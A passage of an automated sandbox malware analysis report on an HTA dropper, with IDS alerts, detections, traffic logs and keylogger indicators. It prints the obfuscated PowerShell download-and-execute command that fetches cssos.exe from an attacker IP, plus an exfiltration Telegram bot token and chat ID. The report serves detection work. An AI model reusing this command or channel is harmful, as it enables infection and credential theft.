WxlKDAsImh0dHA6Ly8xMDcuMTc0LjIzMS4yMTEvMzExL2Nzc29zLmV4ZSIsIiRFTnY6QVBQREFUQVxjb3NzZS5leGUiLDAsMCk7c1RhcnQtc0xlZVAoMyk7aU52b2tlLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxjb3NzZS5leGUi'+[chAR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5004, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qrkmxxq1\qrkmxxq1.cmdline", ProcessId: 1644, ProcessName: csc.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-03-13T01:18:59.938280+010020220501A Network Trojan was detected107.174.231.21180192.168.2.949683TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-03-13T01:19:00.029619+010020220511A Network Trojan was detected107.174.231.21180192.168.2.949683TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-03-13T01:19:07.582871+010028032742Potentially Bad Traffic192.168.2.949684132.226.247.7380TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: http://107.174.231.211/311/cssos.exeAvira URL Cloud: Label: malware
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\cssos[1].exeAvira: detection malicious, Label: TR/AD.SnakeStealer.igtop
                    Source: C:\Users\user\AppData\Roaming\cosse.exeAvira: detection malicious, Label: TR/AD.SnakeStealer.igtop
                    Found malware configuration
                    Source: 00000007.00000002.2094400694.00000000024B1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7996508565:AAHHBM6wSJS6GosO-ff2t38cxPw1t-vbBj8", "Telegram Chatid": "5758197122"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\cssos[1].exeReversingLabs: Detection: 42%
                    Source: C:\Users\user\AppData\Roaming\cosse.exeReversingLabs: Detection: 42%
                    Multi AV Scanner detection for submitted file
                    Source: wecreatebestthingsentirelifeforgivenyou.htaVirustotal: Detection: 37%Perma Link
                    Source: wecreatebestthingsentirelifeforgivenyou.htaReversingLabs: Detection: 23%
                    Joe Sandbox ML detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

                    Location Tracking

                    barindex
                    Tries to detect the country of the analysis system (by using the IP)
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.9:49685 version: TLS 1.0
                    Source: Binary string: wntdll.pdbUGP source: cosse.exe, 00000006.00000003.962909230.0000000003570000.00000004.00001000.00020000.00000000.sdmp, cosse.exe, 00000006.00000003.966284231.00000000033F0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: cosse.exe, 00000006.00000003.962909230.0000000003570000.00000004.00001000.00020000.00000000.sdmp, cosse.exe, 00000006.00000003.966284231.00000000033F0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: $Gr6C:\Users\user\AppData\Local\Temp\qrkmxxq1\qrkmxxq1.pdb source: powershell.exe, 00000003.00000002.975652053.000000000547A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000003.00000002.983878644.000000000798A000.00000004.00000020.00020000.00000000.sdmp
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_0016445A GetFileAttributesW,FindFirstFileW,FindClose,6_2_0016445A
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_0016C6D1 FindFirstFileW,FindClose,6_2_0016C6D1
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_0016C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_0016C75C
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_0016F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_0016F3F3
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_001637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_001637EF
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_00163B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00163B12
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 008E5782h7_2_008E5358
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 008E51B9h7_2_008E4F08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 008E5782h7_2_008E56AF

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 107.174.231.211:80 -> 192.168.2.9:49683
                    Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 107.174.231.211:80 -> 192.168.2.9:49683
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Mar 2025 00:18:59 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Wed, 12 Mar 2025 12:46:06 GMTETag: "ec400-6302496c05d92"Accept-Ranges: bytesContent-Length: 967680Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 1c ad cf 72 7d c3 9c 72 7d c3 9c 72 7d c3 9c 34 2c 22 9c 70 7d c3 9c ec dd 04 9c 73 7d c3 9c 7f 2f 1c 9c 41 7d c3 9c 7f 2f 23 9c c3 7d c3 9c 7f 2f 22 9c 47 7d c3 9c 7b 05 40 9c 7b 7d c3 9c 7b 05 50 9c 57 7d c3 9c 72 7d c2 9c 52 7f c3 9c 0f 04 29 9c 22 7d c3 9c 0f 04 1c 9c 73 7d c3 9c 7f 2f 18 9c 73 7d c3 9c 72 7d 54 9c 73 7d c3 9c 0f 04 1d 9c 73 7d c3 9c 52 69 63 68 72 7d c3 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 fe 81 d1 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 e2 05 00 00 00 00 00 cd 7d 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 0f 00 00 04 00 00 cb 10 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c a4 0b 00 7c 01 00 00 00 70 0c 00 cc 3b 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 0e 00 1c 71 00 00 c0 2b 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 48 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 08 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 dc 08 00 00 10 00 00 00 de 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0e e1 02 00 00 f0 08 00 00 e2 02 00 00 e2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 e0 0b 00 00 52 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 cc 3b 02 00 00 70 0c 00 00 3c 02 00 00 16 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 71 00 00 00 b0 0e 00 00 72 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                    Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                    Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49684 -> 132.226.247.73:80
                    Source: global trafficHTTP traffic detected: GET /311/cssos.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 107.174.231.211Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.9:49685 version: TLS 1.0
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.231.211
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_05027A18 URLDownloadToFileW,3_2_05027A18
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /311/cssos.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 107.174.231.211Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: powershell.exe, 00000003.00000002.975652053.000000000547A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.174.231.211/311/cssos
                    Source: powershell.exe, 00000003.00000002.983878644.000000000798A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.174.231.211/311/cssos.exe
                    Source: powershell.exe, 00000003.00000002.983878644.000000000798A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.174.231.211/311/cssos.exen
                    Source: powershell.exe, 00000003.00000002.983878644.000000000798A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.174.231.211/311/cssos.exev
                    Source: RegSvcs.exe, 00000007.00000002.2094400694.0000000002530000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                    Source: RegSvcs.exe, 00000007.00000002.2094400694.0000000002530000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                    Source: RegSvcs.exe, 00000007.00000002.2094400694.0000000002530000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2094400694.000000000251E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: RegSvcs.exe, 00000007.00000002.2094400694.00000000024B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: RegSvcs.exe, 00000007.00000002.2094400694.0000000002530000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                    Source: cosse.exe, 00000006.00000002.969302157.00000000033B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2090511235.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: RegSvcs.exe, 00000007.00000002.2094400694.0000000002530000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                    Source: powershell.exe, 00000003.00000002.983759813.000000000795D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                    Source: svchost.exe, 00000009.00000002.2095135313.0000024D65A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                    Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                    Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                    Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                    Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                    Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                    Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                    Source: qmgr.db.9.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                    Source: powershell.exe, 00000003.00000002.982169295.00000000060BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000003.00000002.975652053.00000000051A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: RegSvcs.exe, 00000007.00000002.2094400694.000000000254D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                    Source: RegSvcs.exe, 00000007.00000002.2094400694.000000000254D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                    Source: powershell.exe, 00000003.00000002.975652053.00000000051A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000003.00000002.975652053.0000000005051000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2094400694.00000000024B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000003.00000002.975652053.00000000051A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000003.00000002.975652053.00000000051A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000003.00000002.975652053.0000000005051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBGr
                    Source: powershell.exe, 00000003.00000002.975652053.00000000051A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: cosse.exe, 00000006.00000002.969302157.00000000033B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2090511235.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                    Source: powershell.exe, 00000003.00000002.982169295.00000000060BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000003.00000002.982169295.00000000060BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000003.00000002.982169295.00000000060BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: qmgr.db.9.drString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
                    Source: svchost.exe, 00000009.00000003.1203401116.0000024D65810000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
                    Source: powershell.exe, 00000003.00000002.975652053.00000000051A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000003.00000002.982169295.00000000060BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: RegSvcs.exe, 00000007.00000002.2094400694.0000000002530000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: cosse.exe, 00000006.00000002.969302157.00000000033B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2094400694.0000000002530000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2090511235.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: RegSvcs.exe, 00000007.00000002.2094400694.0000000002530000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
                    Source: RegSvcs.exe, 00000007.00000002.2094400694.0000000002530000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 6.2.cosse.exe.33b0000.1.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_0016001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,6_2_0016001C
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_0018CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,6_2_0018CABC

                    System Summary

                    barindex
                    Detected Cobalt Strike Beacon
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWErSheLL -Ex ByPass -NoP -w 1 -C DeViCECReDENtialdEplOyment ; iEx($(IEX('[SyStEM.teXt.encODiNG]'+[ChaR]58+[cHAR]0X3A+'Utf8.gETsTriNG([SYStEM.CoNvErt]'+[CHaR]0X3a+[chAR]58+'FROMbASE64STring('+[ChAR]34+'JG1xZ0doICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlZkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlFtV1RvTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVXlILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENZYlJFKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYeFBHb1lmdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbXFnR2g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjIzMS4yMTEvMzExL2Nzc29zLmV4ZSIsIiRFTnY6QVBQREFUQVxjb3NzZS5leGUiLDAsMCk7c1RhcnQtc0xlZVAoMyk7aU52b2tlLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxjb3NzZS5leGUi'+[chAR]34+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWErSheLL -Ex ByPass -NoP -w 1 -C DeViCECReDENtialdEplOyment ; 